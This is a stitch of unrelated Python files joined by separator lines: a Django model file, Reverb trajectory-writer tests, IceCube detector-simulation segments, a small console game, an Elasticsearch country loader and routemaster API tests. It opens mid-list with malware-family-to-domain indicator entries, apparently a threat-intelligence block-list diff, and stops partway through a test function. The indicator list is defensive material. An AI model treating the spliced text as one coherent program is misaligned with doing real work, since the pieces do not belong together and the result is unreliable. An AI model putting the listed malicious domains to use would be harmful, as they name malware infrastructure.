'None:vowyzuk.com', 'action': 'added'}, {'raw': 'Worm.pykspa:agadss.biz', 'action': 'added'}, {'raw': 'Worm.pykspa:qgasocuiwcymao.info', 'action': 'added'}, {'raw': 'Worm.pykspa:ygsink.info', 'action': 'added'}, {'raw': 'Worm.ainslot:ryan12345.no-ip.biz', 'action': 'added'}, {'raw': 'TrojanDownloader.upatre:hngdecor.com', 'action': 'added'}, {'raw': 'TrojanDownloader.upatre:okeanbg.com', 'action': 'added'}, {'raw': 'TrojanDownloader.upatre:gert-hof.de', 'action': 'added'}, {'raw': 'Packed.fe:spaines.pw', 'action': 'added'}, {'raw': 'None:recdataoneveter.cc', 'action': 'added'}, {'raw': 'Backdoor.vawtrak:mbbllmv.eu', 'action': 'removed'}, {'raw': 'None:mfkxyucmxwhw.com', 'action': 'removed'}, {'raw': 'Worm.pykspa:kegbceiq.info', 'action': 'removed'}, {'raw': 'Virus.gippers:microsoft.mypicture.info', 'action': 'removed'}, {'raw': 'DDoS.nitol:a7677767.vicp.net', 'action': 'removed'}, {'raw': 'Worm.pykspa:yeuawkuiwcymao.info', 'action': 'removed'}, {'raw': 'None:zief.pl', 'action': 'removed'}, {'raw': 'Virus.palevogen:.banjalucke-ljepotice.ru', 'action': 'removed'}, {'raw': 'VirTool.ceeinject:digitalmind.cn', 'action': 'removed'}, {'raw': 'Virus.virut:irc.zief.pl', 'action': 'removed'}, {'raw': 'Trojan.dorv:lyvyxor.com', 'action': 'removed'}, {'raw': 'Virus.sality:sungkhomwit.com', 'action': 'removed'}, {'raw': 'Virus.sality:asesoriaenexposicion.com', 'action': 'removed'}, {'raw': 'TrojanSpy.nivdort:doubledistant.net', 'action': 'removed'}, {'raw': 'None:extsc.3322.org', 'action': 'removed'}, {'raw': 'Virus.sality:solitaireinfo.com', 'action': 'removed'}]
nilq/baby-python
python
import pycountry from matcher.server.main.elastic_utils import get_analyzers, get_char_filters, get_filters, get_index_name, get_mappings from matcher.server.main.logger import get_logger from matcher.server.main.my_elastic import MyElastic SOURCE = 'country' logger = get_logger(__name__) def download_country_data(): countries = [c.__dict__['_fields'] for c in list(pycountry.countries)] return countries def transform_country_data(raw_data): subdivision_name, subdivision_code = {}, {} for subdivision in pycountry.subdivisions: alpha2 = subdivision.country_code.lower() if alpha2 not in subdivision_name: subdivision_name[alpha2] = [] if alpha2 not in subdivision_code: subdivision_code[alpha2] = [] subdivision_name[alpha2].append(subdivision.name) if alpha2 == 'us': subdivision_code[alpha2].append(subdivision.code[3:]) if alpha2 == 'gb': subdivision_name[alpha2].append('northern ireland') countries = [] for c in raw_data: # Alpha 2 - 3 alpha2 = c['alpha_2'].lower() alpha3 = c['alpha_3'].lower() country = {'alpha2': alpha2, 'alpha3': [alpha3]} if alpha2 == 'gb': country['alpha3'].append('uk') # Names names = [] for field_name in ['name', 'official_name', 'common_name']: if field_name in c: names.append(c[field_name]) switcher = { 'bn': ['brunei'], 'ci': ['ivory coast'], 'cv': ['cape verde'], 'cz': ['czech'], 'de': ['deutschland'], 'gb': ['uk'], 'ir': ['iran'], 'kp': ['north korea'], 'kr': ['south korea', 'republic of korea'], 'la': ['laos'], 'mo': ['macau'], 'ru': ['russia'], 'sy': ['syria'], 'tw': ['taiwan'], 'us': ['usa'], 'vn': ['vietnam'] } names += switcher.get(alpha2, []) names = list(set(names)) country['name'] = names # Subdivisions if alpha2 in subdivision_name: country['subdivision_name'] = list(set(subdivision_name[alpha2])) country['subdivision_code'] = list(set(subdivision_code[alpha2])) countries.append(country) return countries def load_country(index_prefix: str = 'matcher') -> dict: es = MyElastic() settings = { 'analysis': { 'char_filter': get_char_filters(), 'filter': get_filters(), 'analyzer': get_analyzers() } } analyzers = { 'name': 'name_analyzer', 'subdivision_name': 'light', 'subdivision_code': 'light', 'alpha3': 'light' } criteria = list(analyzers.keys()) es_data = {} for criterion in criteria: index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix) analyzer = analyzers[criterion] es.create_index(index=index, mappings=get_mappings(analyzer), settings=settings) es_data[criterion] = {} raw_countries = download_country_data() countries = transform_country_data(raw_countries) # Iterate over country data for country in countries: for criterion in criteria: criterion_values = country.get(criterion) criterion_values = criterion_values if isinstance(criterion_values, list) else [criterion_values] if criterion_values is None: logger.debug(f'This element {country} has no {criterion}') continue for criterion_value in criterion_values: if criterion_value not in es_data[criterion]: es_data[criterion][criterion_value] = [] es_data[criterion][criterion_value].append({'country_alpha2': country['alpha2']}) # Bulk insert data into ES actions = [] results = {} for criterion in es_data: index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix) analyzer = analyzers[criterion] results[index] = len(es_data[criterion]) for criterion_value in es_data[criterion]: if criterion_value: action = {'_index': index, 'country_alpha2': list(set([k['country_alpha2'] for k in es_data[criterion][criterion_value]])), 'query': { 'match_phrase': {'content': {'query': criterion_value, 'analyzer': analyzer, 'slop': 2}}}} actions.append(action) es.parallel_bulk(actions=actions) return results
nilq/baby-python
python
#--------------# # Look Away! # # By: Santo C. # #--------------# # Created October 26, 2006 (c) Santo C. # Import the modules needed. import random from time import sleep # Rules Document Rules = """========== Rules of the game: ------------------ Standing in front of you is your game host. He will point in one direction, and you have to face the other direction by selecting the direction. For example, he will point left, which means you will have to look right, and it's done at the split of the moment, so you never know... Bonne Chance! ========== """ # # -The Game Begins!- # print """-------------------------------------- +--------------+ | Look Away! | | By: Santo C. | +--------------+ How to play: Look the other way from the game host! -------------------------------------- Look Away! (c) 2006 Santo C. -------------------------------------- """ #Game Loop while True: print "-=MAIN MENU=-" print "1) Game Rules" print "2) Play" print "3) Quit Game" SLCT = raw_input("Select Choice: ") print if SLCT == '1': # List rules here. print Rules elif SLCT == '2': print "Alright, let's play!" print sleep(2) print "(The game host approaches you for the game...)" print sleep(2) print "Host: Hello there! Let's play some Look Away!" print sleep(2) print "Host: Right... When you're ready..." print "... You can look to the Left, or the Right, or quit at any time." print sleep(2) while True: print "(Which way will you look?)" Direction = raw_input('(1) Left / (2) Right / (3) Quit : ') print if Direction == '1': sleep(2) print "(You will look to the left...)" print sleep(2) print "Host: Ready? And..." print sleep(2) HostDirection = str(random.randrange(1,3)) print "GO!" print "You: ", '<=' if HostDirection == '1': print "Host:", '<=' elif HostDirection == '2': print "Host:", '=>' print sleep(2) if HostDirection != Direction: print "Host: Good, you looked the other way! You win!" print elif HostDirection == Direction: print "Host: Hah, you looked my direction! You lose!" print elif Direction == '2': sleep(2) print "(You will look to the right...)" print sleep(2) print "Host: Ready? And..." print sleep(2) HostDirection = str(random.randrange(1,3)) print "GO!" print "You: ", '=>' if HostDirection == '1': print "Host:", '<=' elif HostDirection == '2': print "Host:", '=>' print sleep(2) if HostDirection != Direction: print "Host: Good, you looked the other way! You win!" print elif HostDirection == Direction: print "Host: Hah, you looked my direction! You lose!" print sleep(2) elif Direction == '3': break else: print print "Please select an option!" print elif SLCT == '3': print "Alright then. About face, and goodbye! :)" sleep(2) break else: print "Please select an option!" print
nilq/baby-python
python
from django.db import models # model to store incoming unpaid cheque details class UnpaidCheque(models.Model): raw_string = models.CharField(max_length=100) voucher_code = models.CharField(max_length=3) cheque_number = models.CharField(max_length=100) reason_code = models.CharField(max_length=3) cheque_amount = models.DecimalField(max_digits=9, decimal_places=2) cheque_value_date = models.DateField() ft_ref = models.CharField(max_length=100, blank=True, null=True) logged_at = models.DateTimeField(auto_now_add=True) is_unpaid = models.BooleanField(default=False) unpaid_value_date = models.DateField(blank=True, null=True) cc_record = models.CharField(max_length=100, blank=True, null=True) unpay_success_indicator = models.CharField(max_length=50, blank=True, null=True) unpay_error_message = models.CharField(max_length=100, blank=True, null=True) cheque_account = models.CharField(max_length=100, blank=True, null=True) owner = models.ForeignKey('auth.User', related_name='unpaid_cheques', on_delete=models.CASCADE) def __str__(self): return self.ft_ref class Meta: ordering = ['logged_at'] # model to store charge details class Charge(models.Model): charge_id = models.CharField(max_length=100) charge_account = models.CharField(max_length=100) charge_amount = models.DecimalField(max_digits=9, decimal_places=2) charge_value_date = models.DateField() charge_success_indicator = models.CharField(max_length=50, blank=True, null=True) ofs_id = models.CharField(max_length=100, blank=True, null=True) ft_ref = models.CharField(max_length=100, blank=True, null=True) is_collected = models.BooleanField(default=False) charge_error_message = models.CharField(max_length=100, blank=True, null=True) cc_record = models.ForeignKey('UnpaidCheque', related_name='charges', on_delete=models.CASCADE) owner = models.ForeignKey('auth.User', related_name='charges', on_delete=models.CASCADE) def __str__(self): return self.charge_id class Meta: ordering = ['charge_id']
nilq/baby-python
python
# Copyright 2019 DeepMind Technologies Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for reverb.trajectory_writer.""" from typing import Optional from unittest import mock from absl.testing import absltest from absl.testing import parameterized import numpy as np from reverb import client as client_lib from reverb import pybind from reverb import server as server_lib from reverb import trajectory_writer import tree class FakeWeakCellRef: def __init__(self, data): self.data = data @property def shape(self): return np.asarray(self.data).shape @property def dtype(self): return np.asarray(self.data).dtype def extract_data(column: trajectory_writer._ColumnHistory): return [ref.data if ref else None for ref in column] def _mock_append(x): return [FakeWeakCellRef(y) if y is not None else None for y in x] class TrajectoryWriterTest(parameterized.TestCase): def setUp(self): super().setUp() self.cpp_writer_mock = mock.Mock() self.cpp_writer_mock.Append.side_effect = _mock_append self.cpp_writer_mock.AppendPartial.side_effect = _mock_append self.writer = trajectory_writer.TrajectoryWriter(self.cpp_writer_mock) def test_history_require_append_to_be_called_before(self): with self.assertRaises(RuntimeError): _ = self.writer.history def test_history_contains_references_when_data_flat(self): self.writer.append(0) self.writer.append(1) self.writer.append(2) history = tree.map_structure(extract_data, self.writer.history) self.assertListEqual(history, [0, 1, 2]) def test_history_contains_structured_references(self): self.writer.append({'x': 1, 'y': 100}) self.writer.append({'x': 2, 'y': 101}) self.writer.append({'x': 3, 'y': 102}) history = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(history, {'x': [1, 2, 3], 'y': [100, 101, 102]}) def test_history_structure_evolves_with_data(self): self.writer.append({'x': 1, 'z': 2}) first = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(first, {'x': [1], 'z': [2]}) self.writer.append({'z': 3, 'y': 4}) second = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(second, { 'x': [1, None], 'z': [2, 3], 'y': [None, 4], }) self.writer.append({'w': 5}) third = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(third, { 'x': [1, None, None], 'z': [2, 3, None], 'y': [None, 4, None], 'w': [None, None, 5], }) self.writer.append({'x': 6, 'w': 7}) forth = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(forth, { 'x': [1, None, None, 6], 'z': [2, 3, None, None], 'y': [None, 4, None, None], 'w': [None, None, 5, 7], }) @parameterized.named_parameters( ('tuple', (0,), (0, 1)), ('dict', {'x': 0}, {'x': 0, 'y': 1}), ('list', [0], [0, 1]), ) def test_append_with_more_fields(self, first_step_data, second_step_data): self.writer.append(first_step_data) self.writer.append(second_step_data) def test_append_returns_same_structure_as_data(self): first_step_data = {'x': 1, 'y': 2} first_step_ref = self.writer.append(first_step_data) tree.assert_same_structure(first_step_data, first_step_ref) # Check that this holds true even if the data structure changes between # steps. second_step_data = {'y': 2, 'z': 3} second_step_ref = self.writer.append(second_step_data) tree.assert_same_structure(second_step_data, second_step_ref) def test_append_forwards_flat_data_to_cpp_writer(self): data = {'x': 1, 'y': 2} self.writer.append(data) self.cpp_writer_mock.Append.assert_called_with(tree.flatten(data)) def test_partial_append_appends_to_the_same_step(self): # Create a first step and keep it open. self.writer.append({'x': 1, 'z': 2}, partial_step=True) first = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(first, {'x': [1], 'z': [2]}) # Append to the same step and keep it open. self.writer.append({'y': 4}, partial_step=True) second = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(second, { 'x': [1], 'z': [2], 'y': [4], }) # Append to the same step and close it. self.writer.append({'w': 5}) third = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(third, { 'x': [1], 'z': [2], 'y': [4], 'w': [5], }) # Append to a new step. self.writer.append({'w': 6}) forth = tree.map_structure(extract_data, self.writer.history) self.assertDictEqual(forth, { 'x': [1, None], 'z': [2, None], 'y': [4, None], 'w': [5, 6], }) def test_columns_must_not_appear_more_than_once_in_the_same_step(self): # Create a first step and keep it open. self.writer.append({'x': 1, 'z': 2}, partial_step=True) # Add another unseen column alongside an existing column with a None value. self.writer.append({'x': None, 'y': 3}, partial_step=True) # Provide a value for a field that has already been set in this step. with self.assertRaisesRegex( ValueError, r'Field \(\'x\',\) has already been set in the active step by previous ' r'\(partial\) append call and thus must be omitted or set to None but ' r'got: 4'): self.writer.append({'x': 4}) def test_create_item_checks_type_of_leaves(self): first = self.writer.append({'x': 3, 'y': 2}) second = self.writer.append({'x': 3, 'y': 2}) # History automatically transforms data and thus should be valid. self.writer.create_item('table', 1.0, { 'x': self.writer.history['x'][0], # Just one step. 'y': self.writer.history['y'][:], # Two steps. }) # Columns can be constructed explicitly. self.writer.create_item('table', 1.0, { 'x': trajectory_writer.TrajectoryColumn([first['x']]), 'y': trajectory_writer.TrajectoryColumn([first['y'], second['y']]) }) # But all leaves must be TrajectoryColumn. with self.assertRaises(TypeError): self.writer.create_item('table', 1.0, { 'x': trajectory_writer.TrajectoryColumn([first['x']]), 'y': first['y'], }) def test_flush_checks_block_until_num_itmes(self): self.writer.flush(0) self.writer.flush(1) with self.assertRaises(ValueError): self.writer.flush(-1) def test_configure_uses_auto_tune_when_max_chunk_length_not_set(self): self.writer.append({'x': 3, 'y': 2}) self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=None) self.cpp_writer_mock.ConfigureChunker.assert_called_with( 0, pybind.AutoTunedChunkerOptions( num_keep_alive_refs=2, throughput_weight=1.0)) def test_configure_seen_column(self): self.writer.append({'x': 3, 'y': 2}) self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=1) self.cpp_writer_mock.ConfigureChunker.assert_called_with( 0, pybind.ConstantChunkerOptions( num_keep_alive_refs=2, max_chunk_length=1)) def test_configure_unseen_column(self): self.writer.append({'x': 3, 'y': 2}) self.writer.configure(('z',), num_keep_alive_refs=2, max_chunk_length=1) # The configure call should be delayed until the column has been observed. self.cpp_writer_mock.ConfigureChunker.assert_not_called() # Still not seen. self.writer.append({'a': 4}) self.cpp_writer_mock.ConfigureChunker.assert_not_called() self.writer.append({'z': 5}) self.cpp_writer_mock.ConfigureChunker.assert_called_with( 3, pybind.ConstantChunkerOptions( num_keep_alive_refs=2, max_chunk_length=1)) @parameterized.parameters( (1, None, True), (0, None, False), (-1, None, False), (1, 1, True), (1, 0, False), (1, -1, False), (5, 5, True), (4, 5, False), ) def test_configure_validates_params(self, num_keep_alive_refs: int, max_chunk_length: Optional[int], valid: bool): if valid: self.writer.configure(('a',), num_keep_alive_refs=num_keep_alive_refs, max_chunk_length=max_chunk_length) else: with self.assertRaises(ValueError): self.writer.configure(('a',), num_keep_alive_refs=num_keep_alive_refs, max_chunk_length=max_chunk_length) def test_episode_steps(self): for _ in range(10): # Every episode, including the first, should start at zero. self.assertEqual(self.writer.episode_steps, 0) for i in range(1, 21): self.writer.append({'x': 3, 'y': 2}) # Step count should increment with each append call. self.assertEqual(self.writer.episode_steps, i) # Ending the episode should reset the step count to zero. self.writer.end_episode() def test_episode_steps_partial_step(self): for _ in range(3): # Every episode, including the first, should start at zero. self.assertEqual(self.writer.episode_steps, 0) for i in range(1, 4): self.writer.append({'x': 3}, partial_step=True) # Step count should not increment on partial append calls. self.assertEqual(self.writer.episode_steps, i - 1) self.writer.append({'y': 2}) # Step count should increment after the unqualified append call. self.assertEqual(self.writer.episode_steps, i) # Ending the episode should reset the step count to zero. self.writer.end_episode() class TrajectoryColumnTest(parameterized.TestCase): @classmethod def setUpClass(cls): super().setUpClass() cls._server = server_lib.Server([server_lib.Table.queue('queue', 100)]) def setUp(self): super().setUp() self.client = client_lib.Client(f'localhost:{self._server.port}') @classmethod def tearDownClass(cls): super().tearDownClass() cls._server.stop() def test_numpy(self): writer = self.client.trajectory_writer(num_keep_alive_refs=10) for i in range(10): writer.append({'a': i, 'b': np.ones([3, 3], np.float) * i}) np.testing.assert_array_equal(writer.history['a'][:].numpy(), np.arange(i + 1, dtype=np.int64)) np.testing.assert_array_equal( writer.history['b'][:].numpy(), np.stack([np.ones([3, 3], np.float) * x for x in range(i + 1)])) def test_numpy_squeeze(self): writer = self.client.trajectory_writer(num_keep_alive_refs=10) for i in range(10): writer.append({'a': i}) self.assertEqual(writer.history['a'][-1].numpy(), i) def test_validates_squeeze(self): # Exactly one is valid. trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)], squeeze=True) # Zero is not fine. with self.assertRaises(ValueError): trajectory_writer.TrajectoryColumn([], squeeze=True) # Neither is two (or more). with self.assertRaises(ValueError): trajectory_writer.TrajectoryColumn( [FakeWeakCellRef(1), FakeWeakCellRef(2)], squeeze=True) def test_len(self): for i in range(1, 10): column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)] * i) self.assertLen(column, i) def test_none_raises(self): with self.assertRaisesRegex(ValueError, r'cannot contain any None'): trajectory_writer.TrajectoryColumn([None]) with self.assertRaisesRegex(ValueError, r'cannot contain any None'): trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1), None]) @parameterized.named_parameters( ('int', 0), ('float', 1.0), ('bool', True), ('np ()', np.empty(())), ('np (1)', np.empty((1))), ('np (1, 1)', np.empty((1, 1))), ('np (3, 4, 2)', np.empty((3, 4, 2))), ) def test_shape(self, data): expected_shape = np.asarray(data).shape for i in range(1, 10): column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)] * i) self.assertEqual(column.shape, (i, *expected_shape)) def test_shape_squeezed(self): expected_shape = (2, 5) data = np.arange(10).reshape(*expected_shape) column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)], squeeze=True) self.assertEqual(column.shape, expected_shape) @parameterized.named_parameters( ('int', 0), ('float', 1.0), ('bool', True), ('np_float16', np.empty(shape=(), dtype=np.float16)), ('np_float32', np.empty(shape=(), dtype=np.float32)), ('np_float64', np.empty(shape=(), dtype=np.float64)), ('np_int8', np.empty(shape=(), dtype=np.int8)), ('np_int16', np.empty(shape=(), dtype=np.int16)), ('np_int32', np.empty(shape=(), dtype=np.int32)), ('np_int64', np.empty(shape=(), dtype=np.int64)), ('np_uint8', np.empty(shape=(), dtype=np.uint8)), ('np_uint16', np.empty(shape=(), dtype=np.uint16)), ('np_uint32', np.empty(shape=(), dtype=np.uint32)), ('np_uint64', np.empty(shape=(), dtype=np.uint64)), ('np_complex64', np.empty(shape=(), dtype=np.complex64)), ('np_complex128', np.empty(shape=(), dtype=np.complex128)), ('np_bool', np.empty(shape=(), dtype=np.bool)), ('np_object', np.empty(shape=(), dtype=np.object)), ) def test_dtype(self, data): expected_dtype = np.asarray(data).dtype column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)]) self.assertEqual(column.dtype, expected_dtype) if __name__ == '__main__': absltest.main()
nilq/baby-python
python
from django.contrib import admin from activities.models import * # Register your models here. admin.site.register(Activity)
nilq/baby-python
python
from django.contrib import admin from .models import GoogleAuthUser class GoogleAuthUserOption(admin.ModelAdmin): """GoogleAuthUser options""" list_display = ('user', 'refresh_token') search_fields = ('user',) admin.site.register(GoogleAuthUser, GoogleAuthUserOption)
nilq/baby-python
python
#!/usr/bin/env python # encoding: utf-8 # # Copyright (c) 2008 Doug Hellmann All rights reserved. # """Translate a glob-style pattern to a regular expression. """ __version__ = "$Id$" #end_pymotw_header import fnmatch pattern = 'fnmatch_*.py' print 'Pattern :', pattern print 'Regex :', fnmatch.translate(pattern)
nilq/baby-python
python
#!/usr/bin/env python from icecube import icetray, dataclasses def ConvertToLinearizedMCTree(frame): if 'I3MCTree' in frame: try: tree = dataclasses.I3LinearizedMCTree(frame['I3MCTree']) except: icecube.icetray.logging.log_error('cannot convert to I3LinearizedMCTree') else: del frame['I3MCTree'] frame['I3MCTree'] = tree return True @icetray.traysegment def DetectorSim(tray, name, RandomService = None, RunID = None, GCDFile = None, KeepMCHits = False, KeepPropagatedMCTree = False, KeepMCPulses = False, SkipNoiseGenerator = False, LowMem = False, InputPESeriesMapName = "I3MCPESeriesMap", BeaconLaunches = True, TimeShiftSkipKeys=[], FilterTrigger=True): """ Read photon-propagated (MCPE) files, simulate noise, PTM response, DOMLaunches, and trigger. :param RandomService: the name of a random service to be used by the tank response :param RunID: Number of run that will be writtend to I3EventHeader :param GCDFile: path to GCD file to read first :param KeepMCHits: keep MCPEs in frame :param KeepPropagatedMCTree: keep MCTree with all in-ice propagated secondaries. These take a lot of space compared un propagated tree. :param KeepMCPulses: keep I3MCPulseSeriesMap in frame. :param SkipNoiseGenerator: do not run Vuvuzela. :param LowMem: reduce peak memory use by repeatedly merging hits as they are generated. WARNING: Use of this option may slightly reduce precision and drastically increase running time. It is potentially useful for very bright events, and probably harmful for very long events. :param InputPESeriesMapName: name of input I3MCPESeriesMap object. :param BeaconLaunches: add beacon lauches. :param TimeShiftSkipKeys: list of keys that should be time-shifted. Default: shift all Time-like objects. :param FilterTrigger: remove events that don't pass any trigger. """ from icecube import icetray, dataclasses, dataio, phys_services from icecube import trigger_sim from I3Tray import I3Units from icecube import DOMLauncher from icecube import topsimulator if RunID is None: icetray.logging.log_fatal("You *must* set a RunID in production.") if not RandomService: icetray.logging.log_fatal("You *must* set a RandomService name.") MCPESeriesMapNames = [ InputPESeriesMapName, "BackgroundI3MCPESeriesMap", "SignalI3MCPEs" ] MCPulseSeriesMapNames = [ "I3MCPulseSeriesMap", "I3MCPulseSeriesMapParticleIDMap" ] MCTreeNames = [ "I3MCTree", "BackgroundI3MCTree", "SignalMCTree" ] MCPMTResponseMapNames = [] if not SkipNoiseGenerator: InputPESeriesMapName_withoutNoise = InputPESeriesMapName + "WithoutNoise" tray.Add("Rename", "RenamePESeriesMap", Keys=[InputPESeriesMapName, InputPESeriesMapName_withoutNoise]) MCPESeriesMapNames.append(InputPESeriesMapName_withoutNoise) from icecube import vuvuzela tray.AddSegment(vuvuzela.AddNoise, name+"_vuvuzela", OutputName = InputPESeriesMapName, InputName = InputPESeriesMapName_withoutNoise, StartTime = -10.*I3Units.microsecond, EndTime = 10.*I3Units.microsecond, RandomServiceName = RandomService, ) tray.AddSegment(DOMLauncher.DetectorResponse, "DetectorResponse", pmt_config = {'Input':InputPESeriesMapName, 'Output':"I3MCPulseSeriesMap", 'MergeHits':True, 'LowMem':LowMem, 'RandomServiceName' : RandomService}, dom_config = {'Input':'I3MCPulseSeriesMap', 'Output':"I3DOMLaunchSeriesMap", 'UseTabulatedPT':True, 'RandomServiceName' : RandomService, 'BeaconLaunches':BeaconLaunches}) timeshiftargs={'SkipKeys':TimeShiftSkipKeys} tray.AddSegment(trigger_sim.TriggerSim, name+'_triggersim', gcd_file=dataio.I3File(GCDFile), # for trigger auto-configuration run_id = RunID, prune = True, time_shift = True, time_shift_args = timeshiftargs, filter_mode = FilterTrigger ) tray.AddModule('I3PrimaryPulseMapper', 'MapPrimariesToPulses') tray.AddModule('I3TopAddComponentWaveforms', 'AddComponentWaveforms', PESeriesMap='I3MCPESeriesMap', Waveforms="") tray.AddModule("Delete", name+"_cleanup", Keys = ["MCTimeIncEventID", "MCPMTResponseMap", ]) if not KeepMCPulses: tray.AddModule("Delete", name+"_cleanup_2", Keys = MCPulseSeriesMapNames + MCPMTResponseMapNames) if not KeepMCHits: tray.AddModule("Delete", name+"_cleanup_I3MCHits_2", Keys = MCPESeriesMapNames) if not KeepPropagatedMCTree: # Always keep original tree tray.AddModule("Delete", name+"_cleanup_I3MCTree_3", Keys = MCTreeNames) @icetray.traysegment def DetectorSegment(tray,name,If=lambda f:True, gcdfile='', mctype='corsika_weighted', MCPESeriesMapName='I3MCPESeriesMap', detector_label='IC86:2012', runtrigger=True, filtertrigger=True, stats={}, basicHisto=False, icetop=False, genie=False, prescale=1, uselineartree=True, lowmem=False, BeaconLaunches=True, TimeShiftSkipKeys=[], GeneratedEfficiency=0.0, SampleEfficiency=0.0, RunID=None, KeepMCHits = False, KeepPropagatedMCTree = False, KeepMCPulses = False, ): """ Run IC86 detector simulation """ from .. import segments # Combine MCPEs from both detectors if genie: tray.Add("Rename", Keys=[MCPESeriesMapName, 'GenieMCPEs']) tray.Add("I3CombineMCPE", InputResponses = ["GenieMCPEs", "BackgroundMCPEs"], OutputResponse = MCPESeriesMapName) tray.Add("Delete", Keys=['BackgroundMCPEs','GenieMCPEs']) if icetop: tray.Add("Rename", Keys=[MCPESeriesMapName, 'InIceMCPEs']) tray.Add("I3CombineMCPE", InputResponses = ["IceTopMCPEs", "InIceMCPEs"], OutputResponse = MCPESeriesMapName) tray.Add("Delete", Keys=['InIceMCPEs', 'IceTopMCPEs']) # Sample a different efficiency if SampleEfficiency > 0.0: if SampleEfficiency > GeneratedEfficiency: icecube.icetray.logging.log_fatal( 'Cannot upscale from GeneratedEfficiency %s to SampleEfficiency %s' % ( SampleEfficiency, GeneratedEfficiency)) tray.AddSegment(segments.MultiDomEffSample,"resample", GeneratedEfficiency=GeneratedEfficiency, SampleEfficiencies=[SampleEfficiency], InputSeriesName=MCPESeriesMapName, DeleteOriginalSeries=True, OverwriteOriginalSeries=True, ) tray.AddSegment(DetectorSim, "DetectorSim", RandomService = 'I3RandomService', GCDFile = gcdfile, InputPESeriesMapName = MCPESeriesMapName, KeepMCHits = KeepMCHits, KeepMCPulses = KeepMCPulses, KeepPropagatedMCTree = KeepPropagatedMCTree, LowMem = lowmem, BeaconLaunches=BeaconLaunches, SkipNoiseGenerator = False, TimeShiftSkipKeys = TimeShiftSkipKeys, FilterTrigger=filtertrigger, RunID=RunID) from ..util import BasicCounter, DAQCounter tray.AddModule(BasicCounter,"count_triggers", Streams = [icetray.I3Frame.DAQ] , name="%s Triggered Events" % detector_label, Stats=stats) skipkeys = [ "I3Triggers", "EnhancementFactor", "MCPMTResponseMap", "MCTimeIncEventID"] skipkeys += ["IceTopRawData_unused","MCPMTResponseMap","MCTopHitSeriesMap"] if "NKGInfo" in skipkeys: # Keep NKGInfo for IceTop skipkeys.remove("NKGInfo") if uselineartree: tray.AddModule(ConvertToLinearizedMCTree,"lineartree",streams=[icetray.I3Frame.DAQ])
nilq/baby-python
python
import json from unittest import mock from routemaster.db import Label, History def test_root(client, version): response = client.get('/') assert response.json == { 'status': 'ok', 'state-machines': '/state-machines', 'version': version, } def test_root_error_state(client, version): with mock.patch( 'sqlalchemy.orm.query.Query.one', side_effect=RuntimeError, ): response = client.get('/') assert response.status_code == 503 assert response.json == { 'status': 'error', 'message': 'Cannot connect to database', 'version': version, } def test_enumerate_state_machines(client, app): response = client.get('/state-machines') assert response.status_code == 200 assert response.json == {'state-machines': [ { 'name': state_machine.name, 'labels': f'/state-machines/{state_machine.name}/labels', } for state_machine in app.config.state_machines.values() ]} def test_create_label(client, app, mock_test_feed): label_name = 'foo' state_machine = app.config.state_machines['test_machine'] label_metadata = {'bar': 'baz'} with mock_test_feed(): response = client.post( f'/state-machines/{state_machine.name}/labels/{label_name}', data=json.dumps({'metadata': label_metadata}), content_type='application/json', ) assert response.status_code == 201 assert response.json['metadata'] == {'bar': 'baz'} with app.new_session(): label = app.session.query(Label).one() assert label.name == label_name assert label.state_machine == state_machine.name assert label.metadata == label_metadata history = app.session.query(History).one() assert history.label_name == label_name assert history.old_state is None assert history.new_state == state_machine.states[0].name def test_create_label_404_for_not_found_state_machine(client): response = client.post( '/state-machines/nonexistent_machine/labels/foo', data=json.dumps({'metadata': {'bar': 'baz'}}), content_type='application/json', ) assert response.status_code == 404 def test_create_label_400_for_invalid_body(client): response = client.post( '/state-machines/test_machine/labels/foo', data='not valid json', content_type='application/json', ) assert response.status_code == 400 def test_create_label_400_for_missing_metadata_key(client): response = client.post( '/state-machines/test_machine/labels/foo', data=json.dumps({}), content_type='application/json', ) assert response.status_code == 400 def test_create_label_409_for_already_existing_label(client, create_label): create_label('foo', 'test_machine', {}) response = client.post( '/state-machines/test_machine/labels/foo', data=json.dumps({'metadata': {}}), content_type='application/json', ) assert response.status_code == 409 def test_update_label(client, app, create_label, mock_webhook, mock_test_feed): create_label('foo', 'test_machine', {}) label_metadata = {'bar': 'baz'} with mock_webhook(), mock_test_feed(): response = client.patch( '/state-machines/test_machine/labels/foo', data=json.dumps({'metadata': label_metadata}), content_type='application/json', ) assert response.status_code == 200 assert response.json['metadata'] == label_metadata with app.new_session(): label = app.session.query(Label).one() assert label.metadata == label_metadata def test_update_label_404_for_not_found_label(client): response = client.patch( '/state-machines/test_machine/labels/foo', data=json.dumps({'metadata': {'foo': 'bar'}}), content_type='application/json', ) assert response.status_code == 404 def test_update_label_404_for_not_found_state_machine(client): response = client.patch( '/state-machines/nonexistent_machine/labels/foo', data=json.dumps({'metadata': {'foo': 'bar'}}), content_type='application/json', ) assert response.status_code == 404 def test_update_label_400_for_invalid_body(client, create_label): create_label('foo', 'test_machine', {}) response = client.patch( '/state-machines/test_machine/labels/foo', data='not valid json', content_type='application/json', ) assert response.status_code == 400 def test_update_label_400_for_no_metadata(client, app, create_label): create_label('foo', 'test_machine', {}) label_metadata = {'bar': 'baz'} response = client.patch( '/state-machines/test_machine/labels/foo', data=json.dumps({'not_metadata': label_metadata}), content_type='application/json', ) assert response.status_code == 400 def test_get_label(client, create_label): 